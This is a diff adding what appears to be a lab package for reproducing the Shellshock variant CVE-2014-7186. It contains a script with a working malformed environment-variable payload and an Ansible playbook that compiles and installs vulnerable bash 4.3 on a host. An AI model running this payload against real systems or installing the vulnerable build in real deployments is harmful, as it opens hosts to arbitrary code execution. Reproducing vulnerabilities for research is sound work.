CVE-2014-7186

CVE-2014-7186/cvex.yml

@@ -0,0 +1,5 @@
+blueprint: ubuntu2204
+ubuntu:
+  trace: bash
+  playbook: exploit.yml
+  command: /tmp/x.sh

CVE-2014-7186/data/x.sh

@@ -0,0 +1,11 @@
+#!/bin/bash
+
+# CVE-2014-7169 specifically exploits a file creation issue in bash. The date command demonstrates
+# the ability to execute arbitrary code through a malformed environment variable &
+# the creation of /tmp/echo file confirms the system executed the file creation, a specific
+# subset of Shellshock 
+# for more info see: https://access.redhat.com/articles/1200223
+
+cd /tmp; rm -f /tmp/echo; env 'x=() { (a)=>\' bash -c "echo date"; cat /tmp/echo
+
+

CVE-2014-7186/exploit.yml

@@ -0,0 +1,50 @@
+---
+- name: Replicate CVE-2014-7186
+  hosts: all
+  become: true
+  tasks:
+    - name: Update apt cache
+      apt:
+        update_cache: yes
+      become: yes
+
+    - name: Install prerequisites
+      apt:
+        name: 
+          - build-essential
+        state: present
+      become: yes
+
+    - name: Copy bash-4.3.tar.gz to /tmp directory on the remote server
+      copy:
+        src: data/bash-4.3.tar.gz
+        dest: /tmp/bash-4.3.tar.gz
+        mode: '0644'
+
+    - name: Extract Bash source
+      unarchive:
+        src: /tmp/bash-4.3.tar.gz
+        dest: /tmp/
+        remote_src: yes
+
+    - name: Compile and install vulnerable Bash
+      shell: |
+        cd /tmp/bash-4.3
+        ./configure
+        make
+        make install
+
+    - name: Verify Bash version
+      shell: "/usr/local/bin/bash --version"
+      register: bash_version_output
+
+    - name: Display Bash version
+      debug:
+        msg: "{{ bash_version_output.stdout }}"
+
+    - name: Copy the script to the target
+      copy:
+        src: data/x.sh # if it worked, the time and date information will be output on the screen and a file called /tmp/echo will be created
+        dest: /tmp/x.sh
+        mode: '0755'
+